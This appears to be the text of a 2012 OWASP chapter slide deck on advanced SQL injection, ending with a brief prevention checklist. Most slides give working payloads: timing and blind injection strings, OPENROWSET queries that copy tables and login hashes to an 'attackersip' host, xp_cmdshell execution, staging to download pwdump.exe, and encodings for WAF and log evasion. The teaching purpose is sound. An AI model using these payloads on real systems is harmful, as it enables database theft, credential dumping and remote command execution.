34
Advanced SQLi and Evasion Techniques

Owasp Indy Q2 2012 Advanced SQLi

Embed Size (px)

Citation preview

Page 1: Owasp Indy Q2 2012 Advanced SQLi

Advanced SQLi and Evasion Techniques

Page 2: Owasp Indy Q2 2012 Advanced SQLi

About Me

IntroductionDamian Profancik | Technical Lead/Security Services Leader

@ Apparatus, [email protected]

@integrisec

Page 3: Owasp Indy Q2 2012 Advanced SQLi

CreditCesar Cerrudo – CTO, IOActive Labs

o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

ModSecurity Team – Trustwave SpiderLabso http://

blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html

Avi Douglen – OWASP Board Member, Israelo http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf

Page 4: Owasp Indy Q2 2012 Advanced SQLi

SQL Injection Basics• Dynamic construction of SQL queries

“SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'”

• Unsanitized user input

uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd = ' '

• Excessive permissiono Web services running as privileged user with db_owner rightso Connecting to database using sa, dbo, or sysadmin accountso Lax file system permissions

Page 5: Owasp Indy Q2 2012 Advanced SQLi
Page 6: Owasp Indy Q2 2012 Advanced SQLi
Page 7: Owasp Indy Q2 2012 Advanced SQLi
Page 8: Owasp Indy Q2 2012 Advanced SQLi
Page 9: Owasp Indy Q2 2012 Advanced SQLi

Advance SQLi Techniques• Blind SQL Injection• Data Exfiltration• Privilege Escalation• Command Execution• Uploading Files• Internal DB Server Exploration• Port Scanning• Firewall Evasion• Log Evasion• WAF Evasion

Page 10: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection

Page 11: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection• Differential Analysis

Example:

http://www.someforum.com/posts.php?id=2

SELECT author, title, body FROM posts WHERE ID = 2

http://www.someforum.com/posts.php?id=2 and 1=2

SELECT author, title, body FROM posts WHERE ID = 2 and 1=2

http://www.someforum.com/posts.php?id=2 and 1=1

SELECT author, title, body FROM posts WHERE ID = 2 and 1=1

Page 12: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection (cont.)• Database Management System Fingerprinting

o System Functions• MS SQL Server = getdate()

• MySQL = now()

• Oracle = sysdate()

• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()

o String Concatenation• MS SQL Server = +

• MySQL = +, CONCAT()

• Oracle = ||, CONCAT()

• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'

o Query Chaining• MS SQL Server, MySQL = allows chaining with semicolon

• Oracle = does NOT allow chaining with semicolon

• Example: http://www.someforum.com/posts.php?id=2; commit --

Page 13: Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection (cont.)• Timing Attacks

o Adding delay• SQL Server = WAIT FOR DELAY '0:0:10‘

• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null)

• PostgreSQL = pg_sleep(10)

• Oracle = Union with query that contains a lot of results

o SELECT IF(condition, true, false)

Example:

…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;

Page 14: Owasp Indy Q2 2012 Advanced SQLi

Attacking MS SQL Server

Page 15: Owasp Indy Q2 2012 Advanced SQLi

Linked and Remote Servers• OPENROWSET

Example:

SELECT * FROM OPENROWSET( 'SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;'

'SELECT * FROM table' )

• OPENDATASOURCE

Example:

SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )

.DatabaseName.dbo.TableName

Page 16: Owasp Indy Q2 2012 Advanced SQLi

Data Exfiltration• Remote server INSERT

Example:

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM table1')

SELECT * FROM table2

Page 17: Owasp Indy Q2 2012 Advanced SQLi

Data Exfiltration (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysdatabases')

SELECT * FROM master.dbo.sysdatabases

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysobjects ')

SELECT * FROM databasename.dbo.sysobjects

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _syscolumns')

SELECT * FROM databasename.dbo.syscolumns

Page 18: Owasp Indy Q2 2012 Advanced SQLi

Data Exfiltration (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM table1')

SELECT * FROM databasename..table1

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM table2')

SELECT * FROM databasename..table2

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

‘SELECT * FROM _sysxlogins')

SELECT * FROM databasename.dbo.sysxlogins

Page 19: Owasp Indy Q2 2012 Advanced SQLi

Privilege Escalation• Known vulnerabilities

Example:

SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation

Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt

• Often not requiredo Connection strings using SA, dbo, sysadmino Web service context

Page 20: Owasp Indy Q2 2012 Advanced SQLi

Command Execution

Example:

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM temp_table')

EXEC master.dbo.xp_cmdshell 'dir'

Page 21: Owasp Indy Q2 2012 Advanced SQLi

Uploading FilesOn attacker’s server…

1. CREATE TABLE AttackerTable (data text)

2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')

On victim’s server…

3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'

4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'

5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'

Page 22: Owasp Indy Q2 2012 Advanced SQLi

Uploading Files (cont.)

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM temp_table')

EXEC xp_cmdshell '"first script line" >> script.vbs'

EXEC xp_cmdshell '"second script line" >> script.vbs'

...

EXEC xp_cmdshell '"last script line" >> script.vbs'

EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary

Page 23: Owasp Indy Q2 2012 Advanced SQLi

Internal DB Server Exploration• Linked and Remote Servers

1. INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysservers')

SELECT * FROM master.dbo.sysservers

2. INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysservers')

SELECT * FROM linkedserver1.master.dbo.sysservers

3. INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',

'SELECT * FROM _sysdatabases')

SELECT * FROM linkedserver1.master.dbo.sysdatabases

4. Rinse and repeat…

Page 24: Owasp Indy Q2 2012 Advanced SQLi

Port Scanning

Example:

SELECT * FROM OPENROWSET('SQLOLEDB',

'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',

'SELECT * FROM table')

Page 25: Owasp Indy Q2 2012 Advanced SQLi

Evasion Techniques

Page 26: Owasp Indy Q2 2012 Advanced SQLi

Firewall Evasion• Use port 80 for outbound

Example:

INSERT INTO OPENROWSET('SQLOLEDB',

'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',

'SELECT * FROM table1')

SELECT * FROM table2

Page 27: Owasp Indy Q2 2012 Advanced SQLi

Log Evasion• Inject using POST parameters

• Long HTTP requestso IIS truncates requests longer than 4097 characterso Sun-One Application Server truncates at 4092 characters

Example:

http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--

Page 28: Owasp Indy Q2 2012 Advanced SQLi

WAF Evasion• Comments

o # = single line commento -- = single line commento /* */ = inline, multi-line commento /*! */ = MySQL-specific inline, multi-line comment

Example:

http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…

• New lineo %0D%0A = URL-encoded newlineo %0B = URL-encoded vertical separator

Example:

http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…

Page 29: Owasp Indy Q2 2012 Advanced SQLi

WAF Evasion (cont.)• Character Encoding

o Unicode (U+02BC = ʼ)o CHAR()o Hexadecimalo URL-encodingo Double Encoding

Example:

Double Encoding:

URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…

WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%252a%2fECT * FROM…

Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…

Page 30: Owasp Indy Q2 2012 Advanced SQLi

WAF Evasion (cont.)• Concatenation

o EXEC()o Split/Joino Special Characters (i.e. ‘[‘, ‘+’, ‘%’, etc.)

Example:

Split/Join:

URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users

WAF = id=SELECT name

id=password FROM users

ASP/ASP.Net = id=SELECT name,password FROM users

Special Characters:

URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users

WAF = id=SEL%ECT name,password FR%OM users

ASP/ASP.Net = id=SELECT name,password FROM users

Page 31: Owasp Indy Q2 2012 Advanced SQLi
Page 32: Owasp Indy Q2 2012 Advanced SQLi

SQL Injection Prevention

Page 33: Owasp Indy Q2 2012 Advanced SQLi

SQLi Prevention• Sanitize User Input

o Normalize Inputo Whitelistso Built-in Functionso Regular Expressionso Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)

• Prepared Statements/Parameterized Queries• Stored Procedures• Accounts with Least Privilege• Enable DisallowAdhocAccess registry setting for MS SQL Server• Perform Self Assessments• Use a Web Application Firewall• Filter Outbound Traffic at Firewall

Page 34: Owasp Indy Q2 2012 Advanced SQLi

Q & A